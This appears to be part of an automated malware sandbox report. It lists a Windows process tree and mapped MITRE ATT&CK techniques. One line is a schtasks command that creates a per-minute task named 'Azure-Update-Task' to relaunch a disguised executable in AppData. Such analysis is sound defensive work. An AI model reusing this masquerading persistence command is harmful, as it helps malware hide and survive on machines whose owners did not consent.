"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8748

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
1⤵
PID:6300
- C:\Windows\SysWOW64\schtasks.exe
  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
  2⤵
  - Creates scheduled task(s)
  PID:7308

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7108

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:9868

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3356

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4824

C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
1⤵
PID:6072

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7324

C:\Users\Admin\AppData\Roaming\irevrui
C:\Users\Admin\AppData\Roaming\irevrui
1⤵
PID:7932

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery